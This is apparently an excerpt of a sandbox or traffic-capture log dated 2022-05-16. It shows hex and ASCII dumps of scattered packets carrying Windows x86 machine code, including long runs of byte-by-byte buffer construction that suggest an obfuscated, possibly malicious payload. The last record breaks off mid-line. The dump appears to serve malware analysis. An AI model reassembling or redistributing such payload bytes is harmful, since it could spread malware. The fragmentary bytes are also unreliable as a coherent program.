2022-05-16 08:29:53 UTC	54	IN	Data Raw: ce ff 15 48 71 9e 00 8b cf ff d6 8b f8 85 ff 74 12 8b 0f 6a 01 8b 31 8b ce ff 15 48 71 9e 00 8b cf ff d6 5f 5e c3 56 eb 18 8b 06 8b ce a3 cc 80 a0 00 e8 be ff ff ff 6a 08 56 e8 56 0a 00 00 59 59 8b 35 cc 80 a0 00 85 f6 75 de 5e c3 56 8b f1 56 c7 06 b0 73 9e 00 e8 54 01 00 00 83 7e 18 00 59 74 09 ff 76 18 e8 c5 6a 00 00 59 83 66 18 00 c7 06 78 72 9e 00 5e c3 55 8b ec 53 8b d9 57 8b 7d 08 39 3b 74 3e 83 3b 00 74 08 ff 33 e8 9e 6a 00 00 59 83 23 00 85 ff 74 2a 80 3f 00 56 8b f7 74 06 46 80 3e 00 75 fa 2b f7 46 56 e8 3f 81 00 00 89 03 59 85 c0 74 0b 56 57 50 e8 85 18 00 00 83 c4 0c 5e 5f 8b c3 5b 5d c2 04 00 55 8b ec 56 8b f1 e8 76 ff ff ff f6 45 08 01 74 0a 6a 20 56 e8 b0 09 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 51 6a 08 e8 6c 09 00 00 89 45 fc 59 85 c0 Data Ascii: Hqtj1Hq_^VjVVYY5u^VVsT~YtvjYfxr^USW}9;t>;t3jY#t*?VtF>u+FV?YtVWP^_[]UVvEtj VYY^]UQjlEY
2022-05-16 08:29:53 UTC	56	IN	Data Raw: ff 75 1d 8b 45 08 83 f8 61 0f 8c c4 00 00 00 83 f8 7a 0f 8f bb 00 00 00 83 e8 20 e9 b3 00 00 00 53 8b 5d 08 81 fb 00 01 00 00 73 42 85 f6 75 0d 53 e8 1d 7f 00 00 59 85 c0 75 37 eb 7f 8b 46 04 f6 04 58 02 74 76 8b 46 04 8b d3 c1 fa 08 0f b6 ca 0f bf 04 48 c1 e8 0f 83 e0 01 85 c0 74 31 6a 02 88 55 fc 88 5d fd c6 45 fe 00 58 eb 2c 85 f6 75 d4 8b c3 c1 f8 08 89 45 f0 e8 a7 7e 00 00 8b 55 f0 0f b6 ca 0f b7 04 48 25 00 80 00 00 eb cb 33 c0 88 5d fc c6 45 fd 00 40 6a 01 ff 75 f4 8d 4d f8 6a 03 51 50 8d 45 fc 50 68 00 02 00 00 57 e8 51 02 00 00 83 c4 20 85 c0 75 04 8b c3 eb 12 83 f8 01 0f b6 45 f8 74 09 0f b6 4d f9 c1 e0 08 0b c1 5b 5f 5e c9 c3 55 8b ec ff 75 08 ff 15 38 70 9e 00 5d c3 55 8b ec 6a 00 68 a0 0f 00 00 ff 75 08 ff 15 34 70 9e 00 5d c3 55 8b ec ff 75 Data Ascii: uEaz S]sBuSYu7FXtvFHt1jU]EX,uE~UH%3]E@juMjQPEPhWQ uEtM[_^Uu8p]Ujhu4p]Uu
2022-05-16 08:29:53 UTC	57	IN	Data Raw: 04 00 56 6a 01 e8 16 8f 00 00 e8 f1 08 00 00 50 e8 85 98 00 00 e8 00 ef ff ff 8b f0 e8 3c b0 00 00 6a 01 89 30 e8 d8 02 00 00 83 c4 0c 5e 84 c0 74 73 db e2 e8 02 0b 00 00 68 76 c5 40 00 e8 4c 04 00 00 e8 3b ea ff ff 50 e8 67 92 00 00 59 59 85 c0 75 51 e8 ad 08 00 00 e8 f8 08 00 00 85 c0 74 0b 68 29 a9 40 00 e8 3b 8f 00 00 59 e8 39 e9 ff ff e8 34 e9 ff ff e8 96 08 00 00 e8 99 ee ff ff 50 e8 22 9e 00 00 59 e8 f3 e9 ff ff 84 c0 74 05 e8 da 94 00 00 e8 7f ee ff ff e8 e9 09 00 00 85 c0 75 01 c3 6a 07 e8 c2 08 00 00 cc e8 87 08 00 00 33 c0 c3 e8 17 0a 00 00 e8 5b ee ff ff 50 e8 69 af 00 00 59 c3 6a 14 68 20 54 a0 00 e8 ce 0a 00 00 6a 01 e8 ef 01 00 00 59 84 c0 0f 84 50 01 00 00 32 db 88 5d e7 83 65 fc 00 e8 a6 01 00 00 88 45 dc a1 dc 81 a0 00 33 c9 41 3b c1 0f Data Ascii: VjP<j0^tshv@L;PgYYuQth)@;Y94P"Ytuj3[PiYjh TjYP2]eE3A;
2022-05-16 08:29:53 UTC	58	IN	Data Raw: 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 51 8d 4c 24 08 2b c8 83 e1 0f 03 c1 1b c9 0b c1 59 e9 4a 08 00 00 51 8d 4c 24 08 2b c8 83 e1 07 03 c1 1b c9 0b c1 59 e9 34 08 00 00 cc cc cc cc 8b 44 24 08 8b 4c 24 10 0b c8 8b 4c 24 0c 75 09 8b 44 24 04 f7 e1 c2 10 00 53 f7 e1 8b d8 8b 44 24 08 f7 64 24 14 03 d8 8b 44 24 08 f7 e1 03 d3 5b c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc 53 56 8b 44 24 18 0b c0 75 18 8b 4c 24 14 8b 44 24 10 33 d2 f7 f1 8b d8 8b 44 24 0c f7 f1 8b d3 eb 41 8b c8 8b 5c 24 14 8b 54 24 10 8b 44 24 0c d1 e9 d1 db d1 ea d1 d8 0b c9 75 f4 f7 f3 8b f0 f7 64 24 18 8b c8 8b 44 24 14 f7 e6 03 d1 72 0e 3b 54 24 10 77 08 72 07 3b 44 24 0c 76 01 4e 33 d2 8b c6 5e 5b c2 10 00 55 8b ec 6a 00 ff 15 54 70 9e 00 ff 75 08 ff 15 50 70 9e 00 68 09 04 00 Data Ascii: QL$+YJQL$+Y4D$L$L$uD$SD$d$D$[SVD$uL$D$3D$A\$T$D$ud$D$r;T$wr;D$vN3^[UjTpuPph
2022-05-16 08:29:53 UTC	60	IN	Data Raw: e8 00 00 00 00 74 03 b0 01 c3 32 c0 c3 68 ec c4 40 00 ff 15 54 70 9e 00 c3 55 8b ec 56 57 8b 7d 08 8b 37 81 3e 63 73 6d e0 75 25 83 7e 10 03 75 1f 8b 46 14 3d 20 05 93 19 74 1d 3d 21 05 93 19 74 16 3d 22 05 93 19 74 0f 3d 00 40 99 01 74 08 5f 33 c0 5e 5d c2 04 00 e8 7d 0c 00 00 89 30 8b 77 04 e8 7c 0c 00 00 89 30 e8 25 aa 00 00 cc 83 25 38 85 a0 00 00 c3 53 56 be 78 50 a0 00 bb 78 50 a0 00 3b f3 73 19 57 8b 3e 85 ff 74 0a 8b cf ff 15 48 71 9e 00 ff d7 83 c6 04 3b f3 72 e9 5f 5e 5b c3 53 56 be 80 50 a0 00 bb 80 50 a0 00 3b f3 73 19 57 8b 3e 85 ff 74 0a 8b cf ff 15 48 71 9e 00 ff d7 83 c6 04 3b f3 72 e9 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 68 e0 e4 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 14 70 a0 00 Data Ascii: t2h@TpUVW}7>csmu%~uF= t=!t="t=@t_3^]}0w\|0%%8SVxPxP;sW>tHq;r_^[SVPP;sW>tHq;r_^[h@d5D$l$l$+SVWp
2022-05-16 08:29:53 UTC	61	IN	Data Raw: 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 0c 66 0f 7f 6f 20 8d 7f 30 73 b7 8d 76 0c e9 af 00 00 00 66 0f 6f 4e f8 8d 76 f8 8d 49 00 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 73 b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76 fc 8b ff 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 04 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 04 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 04 66 0f 7f 6f 20 8d 7f 30 73 b7 8d 76 04 83 f9 10 72 13 f3 0f 6f 0e 83 e9 10 8d 76 10 66 0f 7f 0f 8d 7f 10 eb e8 0f ba e1 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e1 03 73 Data Ascii: Gfof:fo 0svfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0svVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0svrovfsvs
2022-05-16 08:29:53 UTC	77	IN	Data Raw: 00 00 eb 41 3c 6c 74 27 3c 74 74 1a 3c 77 74 0d 3c 7a 75 31 c7 41 2c 06 00 00 00 eb 28 c7 41 2c 0c 00 00 00 eb 1f c7 41 2c 07 00 00 00 eb 16 8b 41 10 80 38 6c 75 08 40 89 41 10 6a 04 eb 02 6a 03 58 89 41 2c b0 01 c3 8a 41 31 3c 46 75 1a 8b 01 83 e0 08 83 c8 00 0f 85 36 01 00 00 c7 41 1c 07 00 00 00 e9 5f 03 00 00 3c 4e 75 26 8b 01 6a 08 5a 23 c2 83 c8 00 0f 85 16 01 00 00 89 51 1c e8 99 30 00 00 c7 00 16 00 00 00 e8 0f 13 00 00 32 c0 c3 83 79 2c 00 75 e7 3c 6a 0f 8f b1 00 00 00 0f 84 a2 00 00 00 3c 49 74 43 3c 4c 74 33 3c 54 74 23 3c 68 0f 85 d8 00 00 00 8b 41 10 80 38 68 75 0c 40 89 41 10 33 c0 40 e9 c1 00 00 00 6a 02 e9 b9 00 00 00 c7 41 2c 0d 00 00 00 e9 b1 00 00 00 c7 41 2c 08 00 00 00 e9 a5 00 00 00 8b 51 10 8a 02 3c 33 75 18 80 7a 01 32 75 12 8d 42 Data Ascii: A<lt'<tt<wt<zu1A,(A,A,A8lu@AjjXA,A1<Fu6A_<Nu&jZ#Q02y,u<j<ItC<Lt3<Tt#<hA8hu@A3@jA,A,Q<3uz2uB
2022-05-16 08:29:53 UTC	93	IN	Data Raw: 85 f6 75 04 33 c0 eb 0e ff 75 08 8b ce ff 15 48 71 9e 00 ff d6 59 5e 5d c3 8b ff 55 8b ec ff 75 08 e8 7b ff ff ff 59 a3 64 87 a0 00 5d c3 8b ff 55 8b ec 83 ec 10 53 8b 5d 08 85 db 75 07 33 c0 e9 1c 01 00 00 56 83 fb 02 74 1b 83 fb 01 74 16 e8 c9 f0 ff ff 6a 16 5e 89 30 e8 40 d3 ff ff 8b c6 e9 fa 00 00 00 57 e8 7b b2 00 00 68 04 01 00 00 be 68 87 a0 00 33 ff 56 57 e8 af ac 00 00 a1 9c 88 a0 00 83 c4 0c 89 35 8c 88 a0 00 89 45 f0 85 c0 74 05 80 38 00 75 05 8b c6 89 75 f0 8d 4d f4 89 7d fc 51 8d 4d fc 89 7d f4 51 57 57 50 e8 b0 00 00 00 6a 01 ff 75 f4 ff 75 fc e8 17 02 00 00 8b f0 83 c4 20 85 f6 75 0c e8 4f f0 ff ff 6a 0c 5f 89 38 eb 32 8d 45 f4 50 8d 45 fc 50 8b 45 fc 8d 04 86 50 56 ff 75 f0 e8 76 00 00 00 83 c4 14 83 fb 01 75 16 8b 45 fc 48 a3 90 88 a0 00 Data Ascii: u3uHqY^]Uu{Yd]US]u3Vttj^0@W{hh3VW5Et8uuM}QM}QWWPjuu uOj_82EPEPEPVuvuEH
2022-05-16 08:29:53 UTC	102	IN	Data Raw: 83 fe ff 0f 84 8a 00 00 00 89 55 fc 89 7d f4 89 75 f8 83 ef 04 3b fe 72 54 8b 07 3b 45 fc 74 f2 33 c2 8b 55 fc d3 c8 8b c8 89 17 89 45 f0 ff 15 48 71 9e 00 ff 55 f0 8b 03 8b 15 14 70 a0 00 8b ca 83 e1 1f 8b 00 8b 18 8b 40 04 33 da d3 cb 33 c2 d3 c8 3b 5d f8 89 5d f0 8b 5d ec 75 05 3b 45 f4 74 af 8b 75 f0 8b f8 89 45 f4 eb a2 83 fe ff 74 0d 56 e8 86 0c 00 00 8b 15 14 70 a0 00 59 8b 03 8b 00 89 10 8b 03 8b 00 89 50 04 8b 03 8b 00 89 50 08 33 c0 5e 5f 5b c9 c3 8b ff 55 8b ec ff 75 08 68 b0 88 a0 00 e8 5a 00 00 00 59 59 5d c3 8b ff 55 8b ec 83 ec 10 6a 02 8d 45 08 89 45 f4 8d 4d ff 58 89 45 f8 89 45 f0 8d 45 f8 50 8d 45 f4 50 8d 45 f0 50 e8 06 fd ff ff c9 c3 8b ff 55 8b ec 8b 4d 08 85 c9 75 05 83 c8 ff 5d c3 8b 01 3b 41 08 75 0d a1 14 70 a0 00 89 01 89 41 04 Data Ascii: U}u;rT;Et3UEHqUp@33;]]]u;EtuEtVpYPP3^_[UuhZYY]UjEEMXEEEPEPEPUMu];AupA
2022-05-16 08:29:53 UTC	109	IN	Data Raw: ff 55 8b ec 8b 45 08 83 ec 10 8b 08 81 f9 50 a7 9e 00 74 0a 51 e8 d8 ef ff ff 8b 45 08 59 ff 70 3c e8 cc ef ff ff 8b 45 08 ff 70 30 e8 c1 ef ff ff 8b 45 08 ff 70 34 e8 b6 ef ff ff 8b 45 08 ff 70 38 e8 ab ef ff ff 8b 45 08 ff 70 28 e8 a0 ef ff ff 8b 45 08 ff 70 2c e8 95 ef ff ff 8b 45 08 ff 70 40 e8 8a ef ff ff 8b 45 08 ff 70 44 e8 7f ef ff ff 8b 45 08 ff b0 60 03 00 00 e8 71 ef ff ff 83 c4 24 8d 45 08 89 45 f4 8d 4d ff 6a 05 58 89 45 f8 89 45 f0 8d 45 f8 50 8d 45 f4 50 8d 45 f0 50 e8 84 fd ff ff 6a 04 8d 45 08 89 45 f4 8d 4d ff 58 89 45 f0 89 45 f8 8d 45 f0 50 8d 45 f4 50 8d 45 f8 50 e8 cc fd ff ff c9 c3 8b ff 55 8b ec 56 8b 75 08 83 7e 4c 00 74 28 ff 76 4c e8 d9 8a 00 00 8b 46 4c 59 3b 05 c0 8b a0 00 74 14 3d e0 71 a0 00 74 0d 83 78 0c 00 75 07 50 e8 ef Data Ascii: UEPtQEYp<Ep0Ep4Ep8Ep(Ep,Ep@EpDE`q$EEMjXEEEPEPEPjEEMXEEEPEPEPUVu~Lt(vLFLY;t=qtxuP
2022-05-16 08:29:53 UTC	125	IN	Data Raw: 2b 5d e4 d1 fb 43 8d 45 e0 50 56 53 57 53 ff 75 e4 56 51 e8 76 21 00 00 8b f0 83 c4 20 85 f6 0f 84 f7 00 00 00 83 7d e0 00 0f 85 ed 00 00 00 80 7c 37 ff 00 0f 85 1f 01 00 00 4e e9 19 01 00 00 8d 45 e0 50 56 53 57 6a ff ff 75 e4 56 51 e8 3b 21 00 00 83 c4 20 8b f8 83 7d e0 00 0f 85 ba 00 00 00 85 ff 74 08 8d 77 ff e9 eb 00 00 00 ff 15 1c 70 9e 00 83 f8 7a 0f 85 9f 00 00 00 85 db 0f 84 0b 01 00 00 8b 45 e4 8b 55 c8 8b 4a 04 83 f9 05 7e 03 6a 05 59 8d 5d e0 53 56 51 8d 4d e8 51 6a 01 50 56 ff 72 08 e8 e2 20 00 00 8b 5d 10 8b d0 83 c4 20 85 d2 0f 84 c6 00 00 00 83 7d e0 00 0f 85 bc 00 00 00 85 d2 0f 88 b4 00 00 00 83 fa 05 0f 87 ab 00 00 00 8d 04 3a 3b c3 0f 87 ae 00 00 00 8b c6 89 45 dc 85 d2 7e 1e 8b 4d d8 8a 44 05 e8 88 04 39 84 c0 0f 84 93 00 00 00 8b 45 Data Ascii: +]CEPVSWSuVQv! }\|7NEPVSWjuVQ;! }twpzEUJ~jY]SVQMQjPVr ] }:;E~MD9E
2022-05-16 08:29:53 UTC	141	IN	Data Raw: e8 14 c4 ff ff 0b f0 8b 45 fc 83 c0 44 50 6a 17 57 8d 45 e8 6a 02 50 e8 fd c3 ff ff 0b f0 8b 45 fc 83 c0 48 50 6a 50 57 8d 45 e8 6a 02 50 e8 e6 c3 ff ff 83 c4 50 0b f0 8b 45 fc 83 c0 4c 50 6a 51 57 8d 45 e8 6a 02 50 e8 cc c3 ff ff 83 c4 14 0b c6 74 29 8b 5d fc 53 e8 40 fc ff ff 53 e8 8f 6f ff ff 8b 45 f8 50 e8 86 6f ff ff 8b 45 f4 50 e8 7d 6f ff ff 83 c4 10 e9 72 fd ff ff 8b 55 f0 8b 12 eb 0b 8d 48 d0 80 f9 09 77 0b 88 0a 42 8a 02 84 c0 75 ef eb 21 3c 3b 75 f3 8b f2 8a 4e 01 88 0e 8d 76 01 84 c9 75 f4 eb e4 8b 7d fc be 10 71 a0 00 6a 14 59 f3 a5 8b 83 88 00 00 00 33 c9 8b 75 fc 41 8b 7d f4 8b 00 89 06 8b 83 88 00 00 00 8b 40 04 89 46 04 8b 83 88 00 00 00 8b 40 08 89 46 08 8b 83 88 00 00 00 8b 40 30 89 46 30 8b 83 88 00 00 00 8b 40 34 89 46 34 8b 45 f8 89 Data Ascii: EDPjWEjPEHPjPWEjPPELPjQWEjPt)]S@SoEPoEP}orUHwBu!<;uNvu}qjY3uA}@F@F@0F0@4F4E
2022-05-16 08:29:53 UTC	157	IN	Data Raw: 0c 8b 4d 08 89 4d e0 89 45 e8 53 8b 5d 14 89 5d e4 56 57 8b 38 85 c9 0f 84 8f 00 00 00 8b 45 10 8b f1 89 7d f0 83 f8 04 73 08 8d 4d f4 89 4d ec eb 05 8b ce 89 75 ec 0f b7 07 53 50 51 e8 a8 1a 00 00 8b d8 83 c4 0c 83 fb ff 74 53 8b 45 ec 3b c6 74 10 39 5d 10 72 31 53 50 56 e8 93 7e fe ff 83 c4 0c 85 db 74 09 8d 0c 33 80 79 ff 00 74 1e 83 c7 02 85 db 74 03 89 7d f0 8b 45 10 2b c3 03 f3 8b 5d e4 89 45 10 eb 9c 8b 45 f0 eb 05 33 c0 8d 71 ff 8b 55 e8 2b 75 e0 89 02 8b c6 eb 3c 8b 55 e8 83 c8 ff 8b 4d f0 89 0a eb 2f 33 f6 eb 10 85 c0 74 07 80 7c 05 f3 00 74 1d 03 f0 83 c7 02 0f b7 07 53 50 8d 45 f4 50 e8 1c 1a 00 00 83 c4 0c 83 f8 ff 75 da eb 03 48 03 c6 8b 4d fc 5f 5e 33 cd 5b e8 18 6f fe ff c9 c3 8b ff 55 8b ec 8b 4d 08 53 8b 5d 10 56 8b 75 14 85 f6 75 1e 85 Data Ascii: MMES]]VW8E}sMMuSPQtSE;t9]r1SPV~t3ytt}E+]EE3qU+u<UM/3t\|tSPEPuHM_^3[oUMS]Vuu
2022-05-16 08:29:53 UTC	173	IN	Data Raw: 72 f3 ff c7 85 cc 71 f3 ff 44 38 9f 00 c7 85 c8 71 f3 ff 87 02 00 00 c7 85 c4 71 f3 ff f4 37 9f 00 c7 85 c0 71 f3 ff e4 0b 00 00 c7 85 bc 71 f3 ff ac 38 9f 00 c6 85 41 73 f3 ff 21 c7 85 b8 71 f3 ff 4c 38 9f 00 c7 85 b4 71 f3 ff 32 20 00 00 c7 85 b0 71 f3 ff 2c 39 9f 00 c6 85 40 73 f3 ff 00 0f b6 85 40 73 f3 ff 83 f8 01 75 52 0f 57 c0 66 0f 13 85 d8 68 f3 ff eb 1e 8b 8d d8 68 f3 ff 83 c1 01 8b 95 dc 68 f3 ff 83 d2 00 89 8d d8 68 f3 ff 89 95 dc 68 f3 ff 83 bd dc 68 f3 ff ff 77 1e 72 0c 81 bd d8 68 f3 ff 22 f6 ff ff 73 10 8a 85 fc 72 f3 ff 04 01 88 85 fc 72 f3 ff eb bb 0f b6 8d 40 73 f3 ff 83 f9 01 75 52 c7 85 ac 71 f3 ff 00 00 00 00 eb 0f 8b 95 ac 71 f3 ff 83 c2 01 89 95 ac 71 f3 ff 8b 85 9c 6b f3 ff 50 e8 e1 d6 5b 00 83 c4 04 39 85 ac 71 f3 ff 7d 20 8b 8d Data Ascii: rqD8qq7qq8As!qL8q2 q,9@s@suRWfhhhhhhwrh"srr@suRqqqkP[9q}
2022-05-16 08:29:53 UTC	189	IN	Data Raw: f3 ff 3c c6 85 18 74 f3 ff ef c6 85 19 74 f3 ff 53 c6 85 1a 74 f3 ff 1b c6 85 1b 74 f3 ff 8f c6 85 1c 74 f3 ff 77 c6 85 1d 74 f3 ff 6d c6 85 1e 74 f3 ff ac c6 85 1f 74 f3 ff 87 c6 85 20 74 f3 ff 6c c6 85 21 74 f3 ff 6c c6 85 22 74 f3 ff 2c c6 85 23 74 f3 ff c6 c6 85 24 74 f3 ff ef c6 85 25 74 f3 ff aa c6 85 26 74 f3 ff 24 c6 85 27 74 f3 ff da c6 85 28 74 f3 ff df c6 85 29 74 f3 ff 1e c6 85 2a 74 f3 ff c2 c6 85 2b 74 f3 ff e6 c6 85 2c 74 f3 ff dd c6 85 2d 74 f3 ff 4c c6 85 2e 74 f3 ff 1e c6 85 2f 74 f3 ff 4f c6 85 30 74 f3 ff aa c6 85 31 74 f3 ff d3 c6 85 32 74 f3 ff 35 c6 85 33 74 f3 ff 1b c6 85 34 74 f3 ff 2e c6 85 35 74 f3 ff 58 c6 85 36 74 f3 ff 2c c6 85 37 74 f3 ff f4 c6 85 38 74 f3 ff 18 c6 85 39 74 f3 ff 5b c6 85 3a 74 f3 ff 57 c6 85 3b 74 f3 ff 83 Data Ascii: <ttStttwtmtt tl!tl"t,#t$t%t&t$'t(t)t*t+t,t-tL.t/tO0t1t2t53t4t.5tX6t,7t8t9t[:tW;t
2022-05-16 08:29:53 UTC	205	IN	Data Raw: 75 52 c7 85 94 6e f3 ff 00 00 00 00 eb 0f 8b 95 94 6e f3 ff 83 c2 01 89 95 94 6e f3 ff 8b 85 00 6f f3 ff 50 e8 aa 57 5b 00 83 c4 04 39 85 94 6e f3 ff 7d 20 8b 8d 00 6f f3 ff 83 c1 01 89 8d 00 6f f3 ff 8b 95 00 6f f3 ff 0f be 02 85 c0 75 02 eb 02 eb ba 0f b6 8d 1f 73 f3 ff 83 f9 01 75 56 0f 57 c0 66 0f 13 85 d0 68 f3 ff eb 1e 8b 95 d0 68 f3 ff 83 c2 01 8b 85 d4 68 f3 ff 83 d0 00 89 95 d0 68 f3 ff 89 85 d4 68 f3 ff 83 bd d4 68 f3 ff 00 77 22 72 0c 81 bd d0 68 f3 ff 77 6c 00 00 73 14 66 8b 8d 60 72 f3 ff 66 83 c1 01 66 89 8d 60 72 f3 ff eb b7 0f b6 95 1f 73 f3 ff 83 fa 01 75 52 c7 85 90 6e f3 ff 00 00 00 00 eb 0f 8b 85 90 6e f3 ff 83 c0 01 89 85 90 6e f3 ff 8b 8d fc 6e f3 ff 51 e8 ea 56 5b 00 83 c4 04 39 85 90 6e f3 ff 7d 20 8b 95 fc 6e f3 ff 83 c2 01 89 95 Data Ascii: uRnnnoPW[9n} ooousuVWfhhhhhhw"rhwlsf`rff`rsuRnnnnQV[9n} n
2022-05-16 08:29:53 UTC	221	IN	Data Raw: 5f f9 ff ff 79 c6 85 60 f9 ff ff 74 c6 85 61 f9 ff ff 73 c6 85 62 f9 ff ff 99 c6 85 63 f9 ff ff 33 c6 85 64 f9 ff ff 25 c6 85 65 f9 ff ff 88 c6 85 66 f9 ff ff 56 c6 85 67 f9 ff ff 97 c6 85 68 f9 ff ff 43 c6 85 69 f9 ff ff 65 c6 85 6a f9 ff ff 32 c6 85 6b f9 ff ff 85 c6 85 6c f9 ff ff 98 c6 85 6d f9 ff ff 86 c6 85 6e f9 ff ff 83 c6 85 6f f9 ff ff 97 c6 85 70 f9 ff ff 39 c6 85 71 f9 ff ff 75 c6 85 72 f9 ff ff 73 c6 85 73 f9 ff ff 96 c6 85 74 f9 ff ff 57 c6 85 75 f9 ff ff 85 c6 85 76 f9 ff ff 64 c6 85 77 f9 ff ff 46 c6 85 78 f9 ff ff 55 c6 85 79 f9 ff ff 96 c6 85 7a f9 ff ff 33 c6 85 7b f9 ff ff 99 c6 85 7c f9 ff ff 54 c6 85 7d f9 ff ff 39 c6 85 7e f9 ff ff 25 c6 85 7f f9 ff ff 44 c6 85 80 f9 ff ff 43 c6 85 81 f9 ff ff 33 c6 85 82 f9 ff ff 44 c6 85 83 f9 ff Data Ascii: _y`tasbc3d%efVghCiej2klmnop9qursstWuvdwFxUyz3{\|T}9~%DC3D
2022-05-16 08:29:53 UTC	237	IN	Data Raw: 83 bd d4 67 f3 ff 00 77 22 72 0c 81 bd d0 67 f3 ff c7 79 00 00 73 14 66 8b 8d 74 72 f3 ff 66 83 c1 01 66 89 8d 74 72 f3 ff eb b7 0f b6 95 15 73 f3 ff 83 fa 01 75 52 c7 85 84 6d f3 ff 00 00 00 00 eb 0f 8b 85 84 6d f3 ff 83 c0 01 89 85 84 6d f3 ff 8b 8d ec 6d f3 ff 51 e8 75 d7 5a 00 83 c4 04 39 85 84 6d f3 ff 7d 20 8b 95 ec 6d f3 ff 83 c2 01 89 95 ec 6d f3 ff 8b 85 ec 6d f3 ff 0f be 08 85 c9 75 02 eb 02 eb ba 0f b6 95 15 73 f3 ff 83 fa 01 75 53 0f 57 c0 66 0f 13 85 c8 67 f3 ff eb 1e 8b 85 c8 67 f3 ff 83 c0 01 8b 8d cc 67 f3 ff 83 d1 00 89 85 c8 67 f3 ff 89 8d cc 67 f3 ff 83 bd cc 67 f3 ff 00 77 1f 72 0c 81 bd c8 67 f3 ff 4e de ff 7f 73 11 8b 95 e8 6d f3 ff 83 c2 01 89 95 e8 6d f3 ff eb ba 0f b6 85 15 73 f3 ff 83 f8 01 75 52 c7 85 80 6d f3 ff 00 00 00 00 eb Data Ascii: gw"rgysftrfftrsuRmmmmQuZ9m} mmmusuSWfggggggwrgNsmmsuRm
2022-05-16 08:29:53 UTC	253	IN	Data Raw: c6 85 24 81 f3 ff 01 c6 85 25 81 f3 ff 3d c6 85 26 81 f3 ff f4 c6 85 27 81 f3 ff 92 c6 85 28 81 f3 ff 7f c6 85 29 81 f3 ff 5a c6 85 2a 81 f3 ff 4d c6 85 2b 81 f3 ff c8 c6 85 2c 81 f3 ff cb c6 85 2d 81 f3 ff 06 c6 85 2e 81 f3 ff 07 c6 85 2f 81 f3 ff c2 c6 85 30 81 f3 ff 81 c6 85 31 81 f3 ff 30 c6 85 32 81 f3 ff eb c6 85 33 81 f3 ff 30 c6 85 34 81 f3 ff 56 c6 85 35 81 f3 ff 26 c6 85 36 81 f3 ff 7c c6 85 37 81 f3 ff e5 c6 85 38 81 f3 ff fb c6 85 39 81 f3 ff 13 c6 85 3a 81 f3 ff f0 c6 85 3b 81 f3 ff d3 c6 85 3c 81 f3 ff 21 c6 85 3d 81 f3 ff 37 c6 85 3e 81 f3 ff d3 c6 85 3f 81 f3 ff f7 c6 85 40 81 f3 ff 20 c6 85 41 81 f3 ff 00 c6 85 42 81 f3 ff 4d c6 85 43 81 f3 ff 47 c6 85 44 81 f3 ff f8 c6 85 45 81 f3 ff 43 c6 85 46 81 f3 ff 56 c6 85 47 81 f3 ff 56 c6 85 48 Data Ascii: $%=&'()Z*M+,-./0102304V5&6\|789:;<!=7>?@ ABMCGDECFVGVH
2022-05-16 08:29:53 UTC	269	IN	Data Raw: f3 ff f4 c6 85 49 8a f3 ff fc c6 85 4a 8a f3 ff b8 c6 85 4b 8a f3 ff 88 c6 85 4c 8a f3 ff 15 c6 85 4d 8a f3 ff f4 c6 85 4e 8a f3 ff e1 c6 85 4f 8a f3 ff 00 c6 85 50 8a f3 ff 4e c6 85 51 8a f3 ff 6d c6 85 52 8a f3 ff f4 c6 85 53 8a f3 ff 92 c6 85 54 8a f3 ff a5 c6 85 55 8a f3 ff ca c6 85 56 8a f3 ff ab c6 85 57 8a f3 ff 3c c6 85 58 8a f3 ff c5 c6 85 59 8a f3 ff 9d c6 85 5a 8a f3 ff ed c6 85 5b 8a f3 ff 53 c6 85 5c 8a f3 ff f4 c6 85 5d 8a f3 ff 74 c6 85 5e 8a f3 ff 56 c6 85 5f 8a f3 ff 96 c6 85 60 8a f3 ff 78 c6 85 61 8a f3 ff d2 c6 85 62 8a f3 ff 26 c6 85 63 8a f3 ff aa c6 85 64 8a f3 ff b5 c6 85 65 8a f3 ff 5e c6 85 66 8a f3 ff e1 c6 85 67 8a f3 ff 07 c6 85 68 8a f3 ff b8 c6 85 69 8a f3 ff b3 c6 85 6a 8a f3 ff 49 c6 85 6b 8a f3 ff ec c6 85 6c 8a f3 ff 33 Data Ascii: IJKLMNOPNQmRSTUVW<XYZ[S\]t^V_`xab&cde^fghijIkl3
2022-05-16 08:29:53 UTC	285	IN	Data Raw: 85 6d 93 f3 ff c3 c6 85 6e 93 f3 ff 1a c6 85 6f 93 f3 ff ce c6 85 70 93 f3 ff 1e c6 85 71 93 f3 ff 96 c6 85 72 93 f3 ff a6 c6 85 73 93 f3 ff 35 c6 85 74 93 f3 ff 3d c6 85 75 93 f3 ff 78 c6 85 76 93 f3 ff f9 c6 85 77 93 f3 ff 0b c6 85 78 93 f3 ff 1e c6 85 79 93 f3 ff 50 c6 85 7a 93 f3 ff 79 c6 85 7b 93 f3 ff 1f c6 85 7c 93 f3 ff b0 c6 85 7d 93 f3 ff 6c c6 85 7e 93 f3 ff 5a c6 85 7f 93 f3 ff 1e c6 85 80 93 f3 ff 38 c6 85 81 93 f3 ff 8a c6 85 82 93 f3 ff 92 c6 85 83 93 f3 ff d2 c6 85 84 93 f3 ff 97 c6 85 85 93 f3 ff bc c6 85 86 93 f3 ff 0b c6 85 87 93 f3 ff 62 c6 85 88 93 f3 ff db c6 85 89 93 f3 ff 28 c6 85 8a 93 f3 ff eb c6 85 8b 93 f3 ff 1f c6 85 8c 93 f3 ff 0b c6 85 8d 93 f3 ff 5a c6 85 8e 93 f3 ff d8 c6 85 8f 93 f3 ff d3 c6 85 